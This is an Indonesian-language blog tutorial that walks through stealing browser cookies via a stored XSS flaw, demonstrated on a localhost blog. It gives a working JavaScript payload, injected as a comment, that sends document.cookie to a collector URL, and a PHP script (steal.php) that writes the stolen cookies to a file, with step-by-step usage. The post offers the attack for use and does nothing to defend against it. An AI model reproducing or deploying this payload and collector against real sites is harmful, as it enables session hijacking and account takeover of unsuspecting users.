Skip to main content

COOKIE STEALING:HOW IT WORKS



HOW IT WORKS


            Sebelumnya kita sudah mengetahui apa itu cookies cara kerja kegunaan atau manfaat dari cookies.Di artikel kali ini saya akan menjelaskan cara kerja dari COOKIE STEALING.

bagaimana proses request & response antara server dan client terjadi?

           Berdasarkan dari gambar diatas hal pertama yang terjadi adalah cllient melakukan request pada server seperti meminta file halaman index.html atau halaman login dll. Selanjutnya server akan menjawab(response) request tersebut dan mengirim file kepada client sesuai permintaan beserta cookies, selanjutnya browser client akan meyimpan cookie tersebut.

Setelah kita mengerti proses diatas kita akan membahas langkah langkah yang harus dilakukan untuk melakukan cookie stealing.

1. vuln xss

           dalam penerapan teknik ini website target di haruskan memiliki celah xss(vuln xss). Xss singkatan dari cross site scripting sendiri adalah celah keamanan suatu website dimana pengguna dapat menginjeksikan suatu script pada website dan website akan menjalankan script tersebut dikarenakan website menganggap script tersebut berasal dari web server miliknya.Script yang dimaksud adalah code pemrograman yang bisa diakses atau di jalankan oleh website atau suatu compiler.

Script yang sering digunakan untuk menguji kelemahan XSS  adalah javascript bahasa pemrograman yang berbasis web.

Disini saya membuat web blog sederhana dengan localhost.


disini kita akan menguji xss dengan javascript seperti dibawah ini.


setelah ‘Posting komentar’ di klik akan muncul pop-up seperti dibawah ini.

Jika muncul pop-up seperti diatas berarti website tersebut vuln xss,Kita akan menggunakan kode javascript sebagai berikut

<script>document.write('<img src="http://127.0.0.1/steal.php?cookies=' + document.cookie + '" />')</script>

penjelasan:
  1. warna kuning pada kode diatas adalah tag(<>) script yang menjadi dasar penulisan dalam javascript dimana <script> menjadi awal kode dan </script> adalah akhir dari kode.
  2. Warna oranye adalah fungsi dalam javascript yang fungsinya adalah mencetak output ke layar.
  3. Warna biru sendiri adalah fungsi pada html untuk mencetak gambar ,disini kita mengkombinasikan documen.write dengan tag img untuk mencetak gambar.
  4. Warna hijau adalah alamat dari file gambar.
  5. Warna ping sendiri adalah file php yang akan kita buat, dimana ?cookie= berarti kita mengirimkan data dengan fungsi GET  pada php.
  6. Warna ungu salah satu fungsi dari javascript yang menyimpan data cookies.
Dengan kode diatas kita bisa mencuri cookie seseorang(document.cookie) dan mengirimkannya dengan fungsi GET pada php (steal.php?cookies=’) .

2. membuat file PHP

           PHP singkatan dari Personal Home Page adalah salah satu bahasa pemrograman web, file php yang akan kita buat berguna untuk menerima cookie yang kita ambil dari kode javascript sebelumnya, lebih jelasnya seperti berikut.

<?php
if(isset($_GET[cookies])){
$cookies = $_GET[cookies];
$file = fopen("cookies.txt",'a+');
fwrite($file,$cookies);}
?>
penjelasan:
  1. warna kuning adalah penanda awal dan akhir dari kode php <?php…(kode)……?>.
  2. Warna biru adalah pengkondisian dalam php dimana jika kondisi bersifat true(benar) maka perintah akan dijalankan if(kondisi){perintah;}.
  3. Warna ping adalah fungsi yang berguna untuk mengecek apakah suatu variabel sudah dibuat sebelumnya.
  4. Warna oranye adalah fungsi GET yang berguna untuk menerima data inputan yang dikirim.
  5. Warna hijau adalah membuat variable dalam php dengan bentuk dasar penulisan seperti ini $nama = tipe atau nilai data; .
  6. Warna coklat baris pertama adalah fungsi untuk mebuka file pada php dimana parameter ‘a+’ memiliki arti membaca dan menulis file dengan kursor berada diakhir file.
  7. Warna coklat baris kedua adalah fungsi untuk menulis file dimana file yang ingin ditulis harus dibuka dahulu dengan fopen dan parameter baca+tulis.
           Kita akan menyimpan kode diatas dengan nama steal.php,setelah itu jangan lupa kiat harus membuat file cookie.txt. Dengan kode diatas kita akan menyimpan data cookies yang kita dapat kedalam file cookies.php

3. cookie stealing

           kita akan menggunakan web blog yang sebelumnya sudah saya buat, dan kita akan menginjeksinya dengan kode javascript yang sudah kita bahas sebelumya.


Klik posting komentar dan halaman web akan terlihat seperti dibawah ini.

Selanjutnya klik kanan pada mouse dan klik view image.

           Maka kode javascript yang kita buat akan otomatis dijalankan oleh browser kita dan data cookies akan disimpan dalam file cookie.txt.Buka file cookies.php jika tampilannya seperti dibawah ini artinya kita berhasil melakukan tekhnik cookie stealing.


How it works?
           Disaat user/client mengirim request server akan menjawab request dan menampilkan seluruh halaman yang diminta termasuk komentar yang kita buat dengan kode javascript akan dianggap server sebagai image file atau file gambar. Jika user merequest atas image file ini maka cookies user tersebut akan teralihkan ke alamat yang kita buat dan data cookies akan diproses oleh file steal.php dan akan ditulis kedalan file cookies.txt.
 
 always remember "Talk Less Do More" keep it in your mind.

Comments

Post a Comment

Popular posts from this blog

COOKIE STEALING:INTRODUCTION

INTRODUCTION                kali ini adalah kali pertama saya menulis blog, di blog ini saya akan membahas seputar pengetahuan tentang komputer dan mungkin hal yang lainnya juga.             Di artikel kali ini saya akan membahas tentang cookie stealing, yang saya bagi menjadi beberapa bagian. Bagian pertama disini saya akan membahas apa itu cookies, cara kerjanya, dan kegunaan ataupun manfaat dari cookies itu sendiri. Apa itu cookies?                Cookie sendiri adalah kumpulan data yang diberikan dari atau oleh web server untuk digunakan lebih lanjut oleh pengguna/user untuk suatu keperluan. Tidak semua website menggunakan cookie pada website nya, dan tidak diharuskan adanya keperluan login untuk menyediakan cookie pada suatu website.Cookie sendiri disimpan pada browser client atau user. Cara kerja cookies?                Saya akan mengambil contoh dari kehidupan sehari-hari terkait cara kerja cookie. Salah satunya disaat saya
Post a Comment
Read more